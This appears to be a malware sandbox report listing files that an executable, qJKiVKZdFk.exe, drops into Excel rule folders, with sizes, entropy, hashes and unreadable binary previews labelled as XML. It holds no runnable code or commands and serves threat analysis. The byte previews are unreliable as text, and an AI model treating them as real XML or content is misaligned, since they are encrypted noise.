                                                                                                                                      Preview:<?xml..:..F$ Z...z..F..%3.!m...i.....5.l.c.Ll.D.``....??.F...9...B...jG....aF.b.Pa .......=...dZ....b....q.#.i..k........4.X..t;A../].Z.X0.vs:..............."Y_<..o.Z...k.o(.x?.$w..\f^...k..+..}....b.5.@....Z?N..;.Er..f...9.....x|......}...PwI..|)L.7cl!o..;U..F.V.V.........mO..;.....%Wk;1C.+.(]^i..-{.:..b...?.c.5..s....u.JV.E...47........=..OR2.hu....Bal"3$.R_78.9}l=.I/...?-..E.W ..?....NSi.*(.~....{....R...C.."v...m.......v..\.;DK....@j..!.#..4G..d...)......|C..j.....-....M.....s..&..G.....$..y...k.M..{1.^~q.m7B.j.rw.)E...K.}.C...z....cq...L.$z..2....6.IY..m .t............A..e.LU@3..i.........&.%y[...S.tbV1)pd....eV.g. ..N..p..%i.._..Et..%...>..,....;X....=....jV.U.W..u......H..>.L/.;f.... ..G*.w|.P..z..s..%:..DH.+.p..3.=.._i|.$...T+..9..5.T.1h..X...c?r....Z...$R4O.......T.t.z..s6..Y(?.....{..q..2..F.u../..._.....d.f...;@.N.U..j....E9qf6....O..GKJ...b._.<.....;.+..|!...$.`..>..q;f*p.sM.~..l|...[.<.v..R#X.n9.4(.u...1L.....?.G^L.d..

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170089v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):715
                                                                                                                                      Entropy (8bit):7.647127826950072
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:6mtgFX29gxuHXFuOLdasyNxQD6Rh0rs5Nsg+Tmrdwf7NhqSmq0yVT8cukIcii9a:6mb9YuVugELWs5N3+AWjHSK8bD
                                                                                                                                      MD5:AF36C6509D935210A20183C46A0A8C44
                                                                                                                                      SHA1:35117EF1C953779E1AF420701C49A64525C283B2
                                                                                                                                      SHA-256:FF6B49FABD6A4E521A69BC06E7B694684022F2C9B7A52F0B9E9D9969B7230237
                                                                                                                                      SHA-512:FA52EB7B1057D2CC3263044F5AFA1EB1FE07081F58F278488C3F1643B19DA4F48C7B0DED9FB214918DA5E601EB4F5A5941A5966502670E25D04C71A9F16EA609
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.;..=.NSN.....J$..~n..Ct2.o.9_....\0..S..K..]m.G.....m..}..{...z....1.8.......l........_..mDn>&.z?...^.........N...e...C....nxX.{....... qZg...pe..CUA.g.....~.......z.cxd......O...$........Aub.c.ZW.x..^.n .....g.....v.x..S.lpX.Stj"=!..@~.....*..D..F..<q.a`....b....U)*.!.WD.=s..`p...V.=?.~Z.y.W......i+..B......]........|...e]0..R..l....?.WK.....=..`...i...9.Eti...Lf..Jl{.I5<...F..........S.0T..g..-._+#....$ku....n.yH.V..yA`..F...\.((....sk..y..s...i....z.W.n....+i..%...1.....je..n.dN..md.3.%o...m..c<.Pc.....b.g......aQ9..p(..t.....+.f.q....:.SV.....F.:.s.U...^F...ni..55.[Y+k.0....Z..0 .[u..!.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170091v2.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1398
                                                                                                                                      Entropy (8bit):7.842717520026983
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:zjYijRvSBLH3XYmbMjrUUHBEqJ99T917VzEdZ4gwyN9RIz5NbD:zjYSRv2H4mbMjrUAEqn1vVYdn+jD
                                                                                                                                      MD5:D600FE515660C6D259035964C80753BD
                                                                                                                                      SHA1:9B489029F3B879096684A5FEBB8254BC916C75CB
                                                                                                                                      SHA-256:1E52B939A983E182799FF61A5B4EE351431CAC27C5ABD71963F58A1FD4F6F92D
                                                                                                                                      SHA-512:9DBDFF67D71661AA6E4876E669683A5B910DA362B591C2CDFE7A2F4FA9CBDD38BEABFD38433A8088676B573E6E203CD4946BF76F570D385F172B2A1A77B84871
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.6.....x1k..'...0//0'.+Yx....=|O....r...c...&.a.T..0.....].A%.......G..|..+...p....)..'......W[.X~N.s...X.5.\$.F..l[.{z..$Q.Z.o..@...*.(../.0|w.e9..$....ac..Bq.`A.....P<1v.9.W.7.L.......s..J!.........pt2s....f...mB.?-.s^[.9..0.....C/.6.5D.....d.Y.r..N.q.X.Z......{P....x...mI.....]M.,"...I .cj...-...r.Y.......Q.;....Qm..v..j....;......AQ.%.`.1...f.?..s.tj9.f....U.8..?\...G.!7...h`...<;...1....7...=)......#....P.;..<({...i...Ki.m.,X(.X....t..(..e(MI.HY~E.>.._..n:C(Fo...s.O.^.....nf.9r#..a.G....%$....nB.~S...CEs...YX..c.......v.%)O...il.&H....`.).'..,Iz.X.O.I...@s..c..z7E.lZ..h..yg5.l..^BK....@...._.......nGU7m..?Hj..]..i0......=...*..........@.*....3!..r..2....v.....%+@7gW......=.#....7.Py..Wr~1.......Y..e..*^..O.@.]y.]t.....1..Y..w...@.3{3...<.Y..A-B...}L...-P.D...R`.HI...GLt.j.g...}.5...........-...d....9`.e.yyE....}_..=..(.".....#.. .>..;>u..c0V...../.ud.f..fu.....z/(gy`...Ar.H..R.%./.l.v......d...~F7....u.zG.O.9w..@.T....Y..?m..Up.pT..v.

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170095v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1008
                                                                                                                                      Entropy (8bit):7.780203810651462
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:mGz0JD0HWZrgEhQjIOiQYvfdkXAfclDb0YeQv/N7GQKfbD:9xWZ02Q8aSdhfYf0Y76D
                                                                                                                                      MD5:AAA232AEC285941D2BD18D5F7111D191
                                                                                                                                      SHA1:95ED802789E39B457D07A01C6B2733075CEB3481
                                                                                                                                      SHA-256:BC0300876D524D7155821500A40D693E10F4889176D1EB08A1A83F906C59DFB8
                                                                                                                                      SHA-512:517A67383B2BF51802F388C20A32642C37DB11106B3BFC459873C881F6613FB7E44BA50292565735453D7F09A45309C8F1D08F20522367CD6B723D038965BBAC
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmlQ.....!.w.~..z.'"E.A..q..<2O....7!...[-}....N.D.*........Y..|l...x<..t....`xkj.?fK.......oir....)..{.o...._;...l._....`..p.!......c.4.(../...Tp..!..}...(..P.....t-..d.~.Km...G.........qTZ..Q..Y..7(.............+9...0...Q...F!.!b7i..>O..)i..?y.}...ah..-\.X.....6.......O<...)b=.....#.g]R.._.!.>...B....!.g!o.. .x..wH...\....h.I1*.%=>I}.r:W....-B.....2s..xW./.H...|.EP.......\..i2.%.<.>2.IT..,..GE.r..G..[Y...P..3..n...v;...]26Bq.K..e.g......m..]..0...F.eG..]..EV{.o%l.;.....F....8.;.....frH...g...#>.[?..gZ0...9.....o]...Z...7%Q......n...}.O.~.)F[9... k||. .J...{.;.q.,.....y.ZJZ..S.[..x\.Q.!X.e......yW.....:>...Fq....p..c.t.T..).}.Z.a.0.:...5+....g\..l.[....e.u$.U..8p |..g.\..Y.Y...<!0...H..l\Z....O4i.a..m..e.........q....P...N...x~4j.....Kh7.u.........)..e....]..A.F..........n.)3..8..../.(..c....a5pm....}........D....&.7...z..J..)S...H.kj...LZ..V....l.+.....s..%+....t...5.m.Jftp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170096v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):719
                                                                                                                                      Entropy (8bit):7.670480165656305
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:G+hZcKsXRtqp4mi+JnyNTtzn3flBoQ0b1TAZERvk7VZiL2ASL5Ltalyajmy2Puk6:FWRUamxyhz3XiZAZEJOZica4Amy5bD
                                                                                                                                      MD5:265AB51CBE99F6354E04237201983AF6
                                                                                                                                      SHA1:BEC8828FEC073CC440B3E33879D2CC5BEBD69362
                                                                                                                                      SHA-256:DB618499ACB2CF99EA5BD911EE4D371F77406EF8EE11765879B7E50FC2B01D74
                                                                                                                                      SHA-512:251673F30C4B92F7A19A9A8360962844FAEB75EE2BE42CF60075E998BCC3BEE13F908896B1E282D423C939A844B218ADCEF9DA8EDC183C3578E64422A0D8874C
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmln)(...<......Y...B[.7..H1..&C.(=L......8b..b%L..:K.[..JPY.!g/|.c.5..&.........~Ha.;X..A.c.Q.J..vO#.[0E.....u..~...$2S........T...~..7.$OY...5I......4.)0.Uh..d...S5.a|.j&........LC..1.52~NC...=....}.%.7......T!Ei..F=...s....>G..}n_..|k..."....e.f..'}.c.(.K;..;..f..<..2.j[....;.A...C.$zB._.._rz#.c.O.C.36.'d!.....,X......k..A...O.;<.N.\4.b.bj....{.*;mw~..z..~.....@..=:.Zp....L.}..|...^......3.;d..a.B.Be.}...XZ.'.L.6k.".[K..F.c.yOhs[.N.sD.^l4.%.U.c..Q..t.q.-Ow.v..B../h1.(.!m.`...#\b.J..u..!.jK@.!...: %T..9.$..J..@..YA.E.y..N.n.'>..(CT.{.../.%..i.W.......pW..wU.g(.....?....$0.y..... Z...:...(wn.z.{..%..&.r..4tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170097v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):793
                                                                                                                                      Entropy (8bit):7.742179359673018
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:fLzRotuEtAVTRdsVDR3VFlpQMerRPynbD:39EqVTRA9V3pQMEiD
                                                                                                                                      MD5:D71410635613FE647CE0117555A1EA43
                                                                                                                                      SHA1:09427D7835CEB277B0F0D60C4B30EDB2123E16EA
                                                                                                                                      SHA-256:043D62EE9B9D461EE1E08F889D29FD3C03052C3A5A7511759C073C05F38B2D66
                                                                                                                                      SHA-512:6DEDDA95A9F9671D3520917621650AEBE3809E596EA859CF8B7394905FB8A2C32EFF79BE1EBD2656590664784EFEFD52ADEC3B8292AB6DE420717F6089B65B58
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.4..2..t...F\.......,5.-.Q!<w0X.....T.;.M.r..Gm$...w.......d...x.z.M....n8g<.Z.pd......9.`........;3................Xz...9.....@...6..4.K.|.n...."B.T.5...9+.K..$...-...'.:...#..*.H.v.?.N......7%!...@5c...m...\.Lp...C6.?...O.H..=..........U.I.r..K.C..}.G.6...P.)+.......LQ%s..[.-../0=....cf.o?....WM.I.P]?.M.._...H,+20O\Z.......(V.#.................I.3=.1....t.......=...G........@...w.c........g.0.c.{...@p7.........=.9.!..V...........i(....30....sQx..k4.\.4.8.......0..A...+.b.......{(C...h>.N....3..l.....h9P.+w;wU<.5.yjr.I.......T(...r)....|...b..f\..|@+...N..L ..\...).:...|H..Y.~f#.9.s.~'..G.B...}....?D.,y..7Lj.N..[.1t.W+.9....0..%|.WY...T..z+3..3.........tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170098v2.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):761
                                                                                                                                      Entropy (8bit):7.675819838636497
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:jGP8SPEOElgBPiBuI0E6bTJgf9qaj3OPqUI8QsPramJ1iFt3FTj2bVrPpAaTAxkT:GZI0/bTmdSPqUI8QszeFt12bdbgWZbD
                                                                                                                                      MD5:06A5D12C360D248DA6E0CF046AC92730
                                                                                                                                      SHA1:8FB9DE26509FAE2434B1F86693E606C08ADBB547
                                                                                                                                      SHA-256:9A6176580B9030FA4C02D7A6ABAABF7B7E8AF096A40461B25C47FBF97DADB1E5
                                                                                                                                      SHA-512:BD4AA99B665C649915495265CFBF5802A570F1B39B16C465EB97A0D1B6451060ECB39D020CFF2946ED0868B378EAB6E736552C7AFEAE6CECB6FF5E1814B5FF67
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml2lv.c.[.......|.....3R..3...Q...B@l.7`.............`O..n...(.......P.;.H#..Q......r84L.M.s80.#...hv.i-..;Ii}v...I.i.d}#q..f.R.,.....+.P.]k..j.......b...^..^..T.+.>......./!VG..Ia.D....BE.N.I...d..E.d.\n@.-H.Z...c/.,?o9..Q.k.}.,.<.U.m.a.%C;vO..Q'J|.{+:.{......\...S/.z..}......V|.)....}.h.;.;...*.g...$.,.R.%kq..m?...iY...3D..<.n.N.zz.-K0.....3$iL].D....ig.O2_3...#w+/\.._..<.{3.pw..LD%....>......S.XJ5.Q..M.............l..e.v~.R..R.No...../..eR..-....!.....[.-l...4.....}}..q.....R.Y:....X..[..G....'..V.S.q1..m....e.....r.....5. .... \c.V...........j..w..v.-.;.o.7..........@%.GAD.<9...6.n.<.l..TA......z..L.a.#.;+{.r.e...$.....<......y..&w.u.h6tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170099v2.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1306
                                                                                                                                      Entropy (8bit):7.847859395831832
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:q5ifn/571W4nRFjWtoGDNI9zN7egWNPgNYEeRffnGLCi4m/TohBIHL/lbD:q8fnhTn7jWtoGJIxNkNPP3nS/TGQT1D
                                                                                                                                      MD5:22158276F9F5FB047EF6A7BF6362E754
                                                                                                                                      SHA1:FBE5D0A7FDC92AFE2020C821677B54769DB9E32F
                                                                                                                                      SHA-256:429218607405CAD089023C3501AA9D45437A87F12F9FBF655856F2A17B676D68
                                                                                                                                      SHA-512:00155B3E836B88BCDD6F5E87D8E2450EB2C12C7F5B786D2D480CD244DA15941342AB183F0792782A7DC2D8DA6C85416D7CD7D414A7549A38BBED50BFFC34BE7B
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml..$..'...yB......Y$/ES.&.Q!.&.i......|{....=.]F,v..O.{....:...*..x..B.].......#v..........a..?D...t.......CAC.*...k.z<c...i...d.>..?.s7j..(..?)...%.H....H.9b...)/.h..I..n.'r....!..E..1..":X.......R..@..~...?(.n..dY.J.....s.v.*.....0...R..S.%..o...,.J..6./.n.-..<..3+.F*ud.....f=..n..IglW^..D.........*...N9..L..k..Z;.%...c[.{.C...sV.9.bm!......9^"M..m..6...g....).x.b....z....-...1..vO....l..+H...@YB.6...C.....*....wb:.w..`.E.d.x..U-.V.j.c=....f .6.- ........F.2h..rW...u..UC.m.......@.M...x.Xp..!s ...4..d..L.ZKV...M r.L.).$...y.5.,.I.Z.p..'..9M,..*..]...BN(.K.dp.k..?..U.S2A...h....4...BO..$U.x@...?......).Nx...`..|.!_o.M.@...8J...A`"...y......Oq.}...1.......J....k/F#dRA|.._...H..>J..9|..n .^.....'......2%wc...L.t;e....[.O+...WAl........[(...$...v8.I....................+..Z(..D.A.g..53...^F..V.n.....d51A.....C..!@...n....#}..N_$......F....D...W./.;.76%./*.".......[.:..,.d..H..vW.".D.:f.1$YB..;f..,.p.1/.>..D..TL...$.].Bq...%..

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170103v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4285
                                                                                                                                      Entropy (8bit):7.96180731168863
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:MD2BrQyN0KtcGDXV6Ys2XEbESK3QTi80jr76uD:MDIQ+0gLVrLEbNBm80jr2uD
                                                                                                                                      MD5:29383684EE2CCF0F5937AC31FCA178C4
                                                                                                                                      SHA1:695648459C433D808FA9A7B55336585D88CC120B
                                                                                                                                      SHA-256:9290A1234413749E4B6D8702A726C1C50090C65A0B15495A9DA286E46A2F9203
                                                                                                                                      SHA-512:044891FEBCA425B53C6145914EDEF5DF646EB20C04F6702FA07B1CE5C8AA4CD87EAAF77A812B35FB5003538F0ED75038EA30680BB69FB21866ABC7A40AEA71BC
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml...$........NmN...lynv.u`...x )..').....\..*...K.%....d..).q+.nJ..W...w..W.FY....Z.\%.......7i..D.~H.\DlF.$.....(h*n.....h.%.....l.<J.n....='............#...h/:....r..T..qY{`..O.M..IsBu...O..2K......(..G1.;...9.......7M\..3(=i.5(....R.l.`U... .......1....k4..u...Ou.2......p.Q.....F..v................0.nA}v..E.,4.Q.....%...V..&g.5h...]..Wd=6.N.)n...s...V.k..o.....7xx...fu...F$.7....;...6..7......,..,.t....g.SY....~D.&.D..*.0........sy..%.....k.w...U.p...qUp...Q.d.(Lt.../PUI].:~)J.ZlU......KcM.."..h.y].:.u.......Y...T.~...&2.m...Kd.V.x.....q..3...N....:gI.........C.,.V....4.!B......ED.y:.:F..]gnVJ5..WYg..G.L...w...'.....).|.+....T"..@I.`Q@..z..5%..]7).A.6~......=R.+a..+F.$i..4qP....U8.....[a.1. |.&E$.."|.SD8..|.....0....}.\...I...uE..V]...2..lqe..:.9z.fS.......d..(..~4...X.l..'i.dX..0H..S..........m...WOs.'n........_..).KA......A..".RO....[]...9..Go.&...b..fT...h....c.).y.."vd_....Y....@ZO.E.v...r....L..J.. ..k'.9R....E..."...

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170104v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):854
                                                                                                                                      Entropy (8bit):7.743622400113326
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:2Nu8ilrmCeo6RGt6pm9WIj9qxmTDLkKMbD:5tlq4gO9qxm7KD
                                                                                                                                      MD5:846710F43B7C7AECD18D82E1E2E4F72A
                                                                                                                                      SHA1:6AA62D8B7EFFF7116E30F65549A7B441D96B5EA0
                                                                                                                                      SHA-256:D819F4DA8EAAF1DCE3FC761E387D0BF67760886BE03E6982EDA22F31E4EADE02
                                                                                                                                      SHA-512:CA8FDB5086A43E2DDF5628BC414F3D81BF0520F7D4A1B512985B309B3661A85BCC37C253F0D76DA6C1175B026C26EBAF25AA051EF1F5AB3FFCDDE3C3F5875FAE
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml...9..r...0?.y.[.l.d(.U......[.wE...c.B.6#E.4...6|+.K.K!..q..^.%..oA.a.r'......a...O3.....J. w.F..i......D..1.R./.........w...!.z9...C7.ps.#.[~}.B....a.#P..2..Z.Q.......,.,...}.v.}...9.Q...E..M.:..o{...5:...".V.?.K..-.HSV..e....v.5..&_.sH ....b.k.{$........e/P.j...h.G.........ZH..I.V.....J...a..\.PTo;......}\Z=.K...6o.....Z....*....Z^.Z..y!..'.G.@..R..x.%..Ki.f.a...V....l$Qc.SE..O.. f4.O...........o.a./H..Lh.(... .f.8.>D.'.8.. ..T............<..a.Cq.0..1...<".C...c....kN@M2.X.U..`......q.V......]...xj.|d...f..#.n...(.:.vtHa$..k...M5..s...I.5..&R...x"-....I.Q<.M.<.@...M.x.....d..b...B.$..v..,...&f..R..p...B..|.W..`D^u.l...|7.A.......|....y3H..^0...-......0j.N.4..'0..3.=&......S............z.<.....`..2...s.+r3...hn<.V... 1tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170105v3.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):929
                                                                                                                                      Entropy (8bit):7.758760221392
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:XPJTzyp6kFIevqnquR45U1BaXrnmrx3vVibD:R3y8kFhqC58BaXq3vmD
                                                                                                                                      MD5:392F02F191310C94EC1196F502D3BE94
                                                                                                                                      SHA1:ED304DC124FE65A10E4C38C8285188E3F95E590E
                                                                                                                                      SHA-256:A4C99CF9833767A5BF5450F183A71BF8F382EC26C55E8B1EF356B681ECC00FC2
                                                                                                                                      SHA-512:1DCC8DD98A4DFF80B569F6F95729D9E268ED212C02CA1DCB6C6F0565DDAFB2E3DAD45FCDE3A31A8B6CAC8F1D9303BEC67A2C588E9B73F3A073BF57608A2E3771
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.u.....O(......Sh".-=..^.1p-..m.z....l..s+]r......{....s.W............o*....5C..j..iv.........).v.X=\...o..'..0x.R..>..,m......."...Vu.2.'..)....#.xK@.z.......#.&..S.'m..../....Y[..(.....sK..3EI*.9;..k*.,A.....`..........=..w..1.`..c.Oo..{...N..E.q(k.8.S..'..........".aF{%5k...H.>......?!).C.g.a.....*...b...%.v.....z.[.2......N...3.w.I;..c(0D.....9.2n.C...m.1..d..`]..._..)......&sa.Ob@.......K..d..4_..Z..uQY.^.b.Goqs.m&.YM...R 3..o..{o.?.X.i37mK..T......2.d0...../.=ac.@....k....1B_....VS%.".`.0.>(.. .AbQ<.....s?.....i....^!V.pr....l..:i%.|Z.5.X.R^..z...1Q(..D}...6.....:..@.|?.../..p.E....S......a.w.(.G....R..V...)4..<Ctp..y.0$..~..=X......e.Q..{F...kp..|.d@..u..... .u.<d...a...d'....I.(q....dfp.jhf$.';}.@.5.V.4g2.c.E....b.....s7O..3..8i..lb^R.r..wu.. NH7.........K?g.e....>.7...|.t.E.o.g.}.(Ztp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170106v2.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):722
                                                                                                                                      Entropy (8bit):7.703115529637489
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:wGe1Od14lvR6bcfrq3JD1iIxHp+JsWFnRH9LUhMySwjSGrylQYxrgYh2bs3yaDtv:myaEbcfr4FosWFnwMyvuGrylLsbsiafh
                                                                                                                                      MD5:FF38AC831667591AD3519CE0DD5446B2
                                                                                                                                      SHA1:0A8C85B42FB5A7EA74492EC3C797082B5A8F21AC
                                                                                                                                      SHA-256:96D5C1805EDA39B7E2904D75E469754025C7CD78691DA081C0257D2023A5D854
                                                                                                                                      SHA-512:3D8504370CA92E373C3108701F37F9BAB51F53DDD27805B318E57047593E8C05407BF8F1D6C38F84E0E68821490BB4960B643DAE1C82F680375CE5982D29AF86
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.;g.....(I....B.Gg0.......O%.N ........1Xm.@.'C.....!P8.oe.. .4...V%k.2.V..K).J.......dI.".........1........L.........&....]W+0.........(6.....t%.1p.D...q.v.....N"+,.....5k..T.....P>....9.l...P....&..R...ZA..0....3...=k....k....w}h"E@.>;..L.8...m..[..h..N.[.r....}j5p%/D...L....O.....;...o.....F..4..G.....1..q...MI...//..4...VT.7"m.Sc.....#Om..i..>gw.\.CY..O....F>.L...%..m..O."...Q"}....'n.S......L...]0Dj.t..( .......C`n|7}B&...JT..@,A...#.."..pM..+..."2...../Y...Y.oOl..a.@Z>@...S.(.......R......Q..C..eO../......3@#.`..#.{.}.....`...Jn...>..}..Z@...C.H.^ZlU.=.<6.`p...K!w.X.p...(`.d$.....rq.A.N5.vC..p....tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170107v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):935
                                                                                                                                      Entropy (8bit):7.742561742915158
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:0Wj86Qo9ga6TnAptRYEdG75fZTZLdgX45H5BCYbD:J87o9B6TApteEUDhdgCZdD
                                                                                                                                      MD5:2D3217AE7F49033D58AD2606F8083CC1
                                                                                                                                      SHA1:4E2BD65AD1C2D23CED5FB1C3AC8B48F09049C871
                                                                                                                                      SHA-256:7530E7B8365F2B6C5F4DF1F75EC44145DD752FB9960E56706ABA8F3A70A19F6A
                                                                                                                                      SHA-512:D2E94F522804DB837C30610BC868E223EB0F26A5886BE86DA8F5EEEE238EBD25C98E66DE096E320340CD0B392BFD72BC9534A736620A81C61C49188C0F91F927
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml..:3.=.....fu.7...c...)BP.JD.....x...V.l....Yo...~...h....g.=!.......A..@.[.b..B!..(...@...p.V..z9d_.s...rz........x........}.....g`.].um5.O..4Tm...UC..............[. .i.`.`.Wy ...+..i.=5.G.{G@.G.p.b..%N...N.u.({.......9.6s...V."T.-^..9l+p..Z.1....|4.y..<z..6cQ-....H.]....Y...[).V..Q..2.%.!7.....By.d...g....t..i....bk...@.=% \...x..4.........qX*....l.Y.:.b....u...OZ.q...I7&.*..t=..>....=lY.m.......................n..r....0.4_..>s ...7...Xn.n!.....n_.vAj.&7Grn.C..7..m^v..00.~...Q..G.....W.D.L-q.....|...)k.,..1..:[Y<I.@V...=.O.......2.-?.]......PoU.y.15........[~F...{...K...4........O<..F\4.yuY.1.$.*I...r;p.[T.oO...N....s&<.P$6$.i.`.O.G..i{.S..N$Kj.gmY..!.c...'...c.v.u?.......5.V.w.....j.I..8:....nL.~.C...wTi?...` Y....w.q.(.v...Y.n!.....)1B.3v.1..443o..rnq/G...bXS..X...$...I..dS.......+CJ..tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170110v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1357
                                                                                                                                      Entropy (8bit):7.846902484777505
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:8ml+36AnBmqt8Q49T3usIwVUGiaVUdz9g5eyEOuvQ7bD:j+KaB7tP4ef9GiD59g5X2Q/D
                                                                                                                                      MD5:BB879035C6C70260B3ACE9760263B845
                                                                                                                                      SHA1:9BDC3081F2AD6BC67BA3145B33B843CAD27E3C03
                                                                                                                                      SHA-256:9B4A7B69B10572F7072C3C1C29B57D644CFE2EF3757FCD1AA0B4B555E87C4D0E
                                                                                                                                      SHA-512:BD2276B871EC111675C4044B17108ACE10BAF2EC903AE0036357BBD40BBA7CF06EB46C5CE7E198F25A1C4247744A7F9CC7154D44D528D9CF8E9C6DF2CE2B37E6
                                                                                                                                      Malicious:false
